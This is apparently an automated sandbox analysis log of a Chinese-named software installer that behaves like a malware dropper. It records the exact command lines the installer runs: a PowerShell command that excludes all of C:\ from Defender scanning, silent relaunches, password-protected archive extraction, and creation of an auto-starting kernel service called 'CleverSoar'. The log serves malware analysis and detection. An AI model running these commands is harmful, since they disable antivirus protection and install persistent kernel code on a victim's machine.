Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4604:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2700:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1236:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5756:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6168:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1700:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:404:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4408:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4428:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1516:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6744:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:404:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6024:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4416:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5172:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3868:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6724:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1136:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2996:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5260:120:WilError_03
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmpJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeFile read: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$20424,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043C,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$20424,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043C,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: mpr.dllJump to behavior
